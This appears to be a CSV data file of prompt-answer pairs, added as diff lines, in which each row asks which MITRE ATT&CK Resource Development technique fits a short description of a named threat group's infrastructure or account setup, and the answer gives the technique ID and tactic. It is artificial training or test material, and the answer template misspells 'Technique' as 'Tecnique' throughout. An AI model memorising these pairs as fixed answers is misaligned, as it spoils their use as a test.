+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team used various third-party email campaign management services to deliver phishing emails.,"Tecnique: T1583 Acquire Infrastructure, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0010, UNC3890 actors established domains that appeared to be legitimate services and entities, such as LinkedIn, Facebook, Office 365, and Pfizer.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0011, Transparent Tribe registered domains likely designed to appear relevant to student targets in India.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0021, the threat actors registered domains for use in C2.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0026, the threat actors re-registered expired C2 domains previously used for ANDROMEDA malware.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For FunnyDream, the threat actors registered a variety of domains.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dust Storm, the threat actors established domains as part of their operational infrastructure.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Ghost, APT29 registered domains for use in C2 including some crafted to appear as existing legitimate domains.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, threat actors registered domains for C2.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For the SolarWinds Compromise, APT29 acquired C2 domains, sometimes through resellers.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has registered hundreds of domains for use in operations.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has set up and operated websites to gather information and deliver malware.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has registered a variety of domains to host malicious payloads and for C2.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has registered domains for targeting intended victims.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has registered domains to spoof targeted organizations by changing the top-level domain (TLD) to “.us”, “.co” or “.biz”.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has registered look-alike domains for use in phishing campaigns.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious Kitten has acquired domains imitating legitimate sites.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has registered multiple domains to facilitate payload staging and C2.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has registered domains to spoof targeted organizations and trusted third parties.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used dynamic DNS providers to create legitimate-looking subdomains for C2.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has registered fraudulent domains such as ""mail-newyorker.com"" and ""news12.com.recover-session-service.site"" to target specific victims with phishing attacks.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda have acquired C2 domains prior to operations.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages, while also hosting these items on legitimate, compromised network infrastructure.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has registered domains often containing the keywords “kimjoy,” “h0pe,” and “grace,” using domain registrars including Netdorm and No-IP DDNS, and hosting providers including xTom GmbH and Danilenko, Artyom.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has registered domains to impersonate services such as Dropbox to distribute malware.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has obtained domains to host their payloads.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has registered domains for C2.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has registered domains to mimic file sharing, government, defense, and research websites for use in targeted campaigns.","Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti Group has registered domains for C2 that mimicked sites of their intended targets.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has purchased domains for use in targeted campaigns.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has registered malicious domains for use in intrusion campaigns.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate command and control includes hard-coded domains in the malware chosen to masquerade as legitimate services such as Akamai CDN or Amazon Web Services.,"Tecnique: T1583.001 Acquire Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has acquired dynamic DNS services for use in the targeting of intended victims.,"Tecnique: T1583.002 Acquire Infrastructure: DNS Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records.,"Tecnique: T1583.002 Acquire Infrastructure: DNS Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used Virtual Private Server (VPS) infrastructure.","Tecnique: T1583.003 Acquire Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 hosted phishing domains on free services for brief periods of time during campaigns.,"Tecnique: T1583.003 Acquire Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used VPS hosting providers in targeting of intended victims.,"Tecnique: T1583.003 Acquire Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has acquired VPS infrastructure for use in malicious campaigns.,"Tecnique: T1583.003 Acquire Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has operated from leased virtual private servers (VPS) in the United States.,"Tecnique: T1583.003 Acquire Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used VPS hosting providers for infrastructure.,"Tecnique: T1583.003 Acquire Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors purchased hosted services to use for C2.","Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.","Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Honeybee, at least one identified persona was used to register for a free account for a control server.","Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Wocao, the threat actors purchased servers with Bitcoin to use during the operation.","Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role.","Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM has used Taiwan-based servers that appear to be exclusive to GALLIUM.,"Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has purchased hosting servers with virtual currency and prepaid cards.,"Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has acquired servers to host second-stage payloads that remain active for a period of either days, weeks, or months.","Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.,"Tecnique: T1583.004 Acquire Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.","Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader.","Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used newly-created Blogspot pages for credential harvesting operations.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS. APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations.","Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.","Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has obtained cloud storage service accounts to host stolen data.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has established GitHub accounts to host their malware.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has set up Amazon S3 buckets to host trojanized digital products.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has acquired web services for use in C2 and exfiltration.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra created Dropbox accounts for their operations.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has hosted content used for targeting efforts via web services such as Blogspot.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has hosted malicious downloads on Github.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has established GitHub accounts to host its toolsets.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has acquired Amazon S3 buckets to use in C2.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools.","Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has hosted malicious files on various platforms including Google Drive, OneDrive, Discord, PasteText, ShareText, and GitHub.","Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.,"Tecnique: T1583.006 Acquire Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has posted false advertisements including for software packages and browser updates in order to distribute malware.,"Tecnique: T1583.008 Acquire Infrastructure: Malvertising, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0010, UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company.","Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0021, the threat actors used legitimate but compromised domains to host malicious payloads.","Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.","Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For the SolarWinds Compromise, APT29 compromised domains to use for C2.","Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 hijacked FQDNs associated with legitimate websites hosted by hop points.,"Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has compromised legitimate sites and used them to distribute malware.,"Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used compromised domains to host links targeted to specific phishing victims.,"Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest operates a global network of compromised websites that redirect into a traffic distribution system (TDS) to select victims for a fake browser update page.,"Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware.","Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has compromised domains for use in targeted malicious campaigns.,"Tecnique: T1584.001 Compromise Infrastructure: Domains, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has reconfigured a victim's DNS records to actor-controlled domains and websites.,"Tecnique: T1584.002 Compromise Infrastructure: DNS Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used the VPS infrastructure of compromised Iranian threat actors.,"Tecnique: T1584.003 Compromise Infrastructure: Virtual Private Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors compromised web servers to use for C2.","Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.","Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Sharpshooter, the threat actors compromised a server they used as part of the campaign's infrastructure.","Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has compromised legitimate websites to host C2 and malware modules.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used compromised web servers as part of their operational infrastructure.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has served fake updates via legitimate websites that have been compromised.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has compromised servers to stage malicious tools.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team compromised legitimate Linux servers running the EXIM mail transfer agent for use in subsequent campaigns.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used compromised servers as infrastructure.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used compromised PRTG servers from other organizations for C2.,"Tecnique: T1584.004 Compromise Infrastructure: Server, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used large groups of compromised machines for use as proxy nodes.,"Tecnique: T1584.005 Compromise Infrastructure: Botnet, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices.,"Tecnique: T1584.005 Compromise Infrastructure: Botnet, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has compromised Google Drive repositories.,"Tecnique: T1584.006 Compromise Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has frequently used compromised WordPress sites for C2 infrastructure.,"Tecnique: T1584.006 Compromise Infrastructure: Web Services, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used compromised and out-of-support Cyberoam VPN appliances for C2.","Tecnique: T1584.008 Compromise Infrastructure: Network Devices, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 compromised Ubiquiti network devices to act as collection devices for credentials compromised via phishing webpages.,"Tecnique: T1584.008 Compromise Infrastructure: Network Devices, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has compromised small office and home office (SOHO) network edge devices, many of which were located in the same geographic area as the victim, to proxy network traffic.","Tecnique: T1584.008 Compromise Infrastructure: Network Devices, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT17 has created and cultivated profile pages in Microsoft TechNet. To make profile pages appear more legitimate, APT17 has created biographical sections and posted in forum threads.","Tecnique: T1585 Establish Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has created KeyBase accounts to communicate with ransomware victims.,"Tecnique: T1585 Establish Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.","Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Ghost, APT29 registered Twitter accounts to host C2 nodes.","Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has set up Facebook pages in tandem with fake websites.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CURIUM has established a network of fictitious social media accounts, including on Facebook and LinkedIn, to establish relationships with victims, often posing as an attractive woman.","Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cleaver has created fake LinkedIn profiles that included profile photos, details, and connections.","Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has established social media profiles to mimic employees of targeted companies.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used a Twitter account to communicate with ransomware victims.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has created social media accounts to monitor news and security trends as well as potential targets.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has created new Twitter accounts to conduct social engineering against potential victims.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has created new social media accounts for targeting efforts.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has established social media accounts to disseminate victim internal-only documents and other sensitive data.,"Tecnique: T1585.001 Establish Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For FunnyDream, the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dust Storm, the threat actors established email addresses to register domains for their operations.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, attackers created email addresses to register for a free account for a control server used for the implants.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Wocao, the threat actors registered email accounts to use during the campaign.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has created email accounts for later use in social engineering, phishing, and when registering domains.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has created e-mail accounts to spoof targeted organizations.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
